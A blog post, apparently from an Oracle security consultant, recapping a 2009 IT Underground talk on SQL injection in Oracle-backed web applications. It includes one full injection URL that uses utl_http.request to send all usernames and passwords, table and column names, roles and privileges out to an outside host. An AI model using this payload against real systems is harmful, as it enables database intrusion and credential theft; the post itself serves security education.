Calendar
März 2009
M D M D F S S
« Feb   Apr »
 1
2345678
9101112131415
16171819202122
23242526272829
3031  

IT Underground Prague - Presentation

Just back from the IT Underground 2009 in Prague.

I met several smart security consultants and some of my customers from different countries in Europe (Belgium, Poland, Germany, UK, …) and had a lot of interesting talks.

I gave a presentation concerning SQL Injection in web applications with Oracle backend databases.

Here a short example from the presentation:

The following (vulnerable) URL is sending all usernames/passwords, all accessible tables, tables and column, roles and privileges in a single SQL statement to a remote system. This can be done with a simple trick. Just use sum(length(utl_http.request(()))).

http://victim.com/order.jsp?id=17‘ or 1=((select sum(length(utl_http.request(’http://www.orasploit.com/’username||’='||password) from dba_users)))+((select sum(length(utl_http.request(’http://www.orasploit.com/’owner||’='||table_name) from dba_tables)))+((select sum(length(utl_http.request(’http://www.orasploit.com/’owner||’='||table_name||’='||column_name)) from dba_users))+((select sum(length(utl_http.request(’http://www.orasploit.com/’grantee||’='||granted_role) from dba_role_privs)))+((select sum(length(utl_http.request(’http://www.orasploit.com/’grantee||’='||owner||’='||table_name||’='||privilege||’='||grantable) from dba_tab_privs)))–

More details in the presentation.

1 Antwort auf “IT Underground Prague - Presentation”

  1. Alexander Kornbrust Oracle Security Blog » Blog Archive » Pangolin 2.0.2.820 with enhanced Oracle support sagt:

    […] 27 Mrz 2009: IT Underground Prague - Presentation […]

Antwort schreiben

Sie müssen als angemeldet sein, um einen Kommentar schreiben zu können.